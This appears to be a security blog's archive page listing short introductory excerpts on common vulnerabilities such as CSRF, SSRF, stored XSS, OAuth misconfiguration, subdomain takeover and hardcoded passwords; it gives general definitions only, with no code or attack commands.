Vulnerability

What is Insecure OS/Firmware Hardcoded Password – Non-Privileged User Vulnerability?

Leave a Comment / Security News, Vulnerability / By

Included credentials, also known as hardcoded credentials, are plain text credentials that are embedded in source code. The technique of inserting plain text (non-encrypted) credentials (account passwords, SSH keys, DevOps secrets, etc.) into source code is referred to as password/credential hardcoding. Hardcoding credentials, on the other hand, is increasingly discouraged since they offer significant security …

What is Insecure OS/Firmware Hardcoded Password – Non-Privileged User Vulnerability? Read More »

What is Application-Level Denial-of-Service (DoS) Vulnerability?

Leave a Comment / Security News, Vulnerability / By

Application DDoS assaults are distributed denial of service (DDoS) attacks that overload online application services with a virtual flood of internet data. The substantial increase in traffic overwhelms computers and networks, preventing them from processing incoming requests and forcing them to go down. Computers, servers, and internet of things (IoT) devices are frequently hacked and …

What is Application-Level Denial-of-Service (DoS) Vulnerability? Read More »

What is Cross-site request forgery (CSRF) Vulnerability?

Leave a Comment / Security News, Vulnerability / By

Cross-Site Request Forgery (CSRF) is an attack that compels an authorized end-user to do undesirable activities on a web application. An attacker can deceive users of a web application into performing activities of the attacker’s choosing with the use of social engineering (such as delivering a link through email or chat). If the target is …

What is Cross-site request forgery (CSRF) Vulnerability? Read More »

What is Server-Side Request Forgery (SSRF) vulnerability?

Leave a Comment / Security News, Vulnerability / By

Server-side request forgery (also known as SSRF) is a web security flaw that allows an attacker to force a server-side application to send HTTP requests to any domain of the attacker’s choice. In a typical SSRF attack, the attacker may instruct the server to connect to internal-only services within the organization’s infrastructure. In other circumstances, …

What is Server-Side Request Forgery (SSRF) vulnerability? Read More »

What is Cross-Site Scripting (XSS) Stored – Non-Privileged User to Anyone vulnerability?

Leave a Comment / Security News, Vulnerability / By

When a web application transmits stored strings given by an attacker to a victim’s browser in such a way that the browser executes part of the text as code, a Stored Cross-Site Scripting (XSS) vulnerability occurs. The string includes harmful data and is originally saved on the server, commonly in the database of the application. …

What is Cross-Site Scripting (XSS) Stored – Non-Privileged User to Anyone vulnerability? Read More »

What is Weak Password Reset Implementation – Token Leakage via Host Header Poisoning vulnerability?

Leave a Comment / Security News, Vulnerability / By

Weak Password Reset Implementation – Token Leakage via Host Header Poisoning Vulnerability is a critical security issue that can have severe consequences for web applications and their users. This vulnerability arises when a web application improperly handles password reset tokens and fails to validate the host header correctly. In such cases, an attacker can manipulate …

What is Weak Password Reset Implementation – Token Leakage via Host Header Poisoning vulnerability? Read More »

What is OAuth Misconfiguration – Account Takeover vulnerability?

Leave a Comment / Security News, Vulnerability / By

OAuth 2.0 is a Web Application Authorization Framework. It verifies a user’s identity to the website that requested it without giving passwords to the website. A flaw in the OAuth flow allows for the takeover of the victim’s account. Unvalidated redirects and forwards are conceivable when a web application takes untrusted input, which may lead …

What is OAuth Misconfiguration – Account Takeover vulnerability? Read More »

What is Misconfigured DNS – High Impact Subdomain Takeover vulnerability?

Leave a Comment / Security News, Vulnerability / By

A Misconfigured DNS – High Impact Subdomain Takeover Vulnerability is a critical security issue that occurs when an attacker gains control over a subdomain of a website or application due to misconfigured DNS settings. This can lead to a range of high-impact attacks, such as phishing, data theft, and complete compromise of the affected subdomain. …

What is Misconfigured DNS – High Impact Subdomain Takeover vulnerability? Read More »

What is Cryptographic Flaw vulnerability?

Leave a Comment / Security News, Vulnerability / By

Broken cryptography, or the use of cryptography in an unsafe manner, is quite widespread among mobile apps that use encryption. Broken encryption may express itself in two ways in mobile applications. First, the mobile app may have a fundamentally faulty encryption/decryption technique that may be abused by an attacker to decode sensitive data. Second, the …

What is Cryptographic Flaw vulnerability? Read More »

What is Hardcoded Password vulnerability?

Leave a Comment / Security News, Vulnerability / By

Hardcoded Passwords, also known as Included Credentials, are plain text passwords or other secrets that are embedded in source code. The technique of inserting plain text (non-encrypted) passwords and other secrets (SSH keys, DevOps secrets, etc.) into source code is known as password hardcoding. Default, hardcoded passwords can be used across a wide range of …

What is Hardcoded Password vulnerability? Read More »

Scroll to Top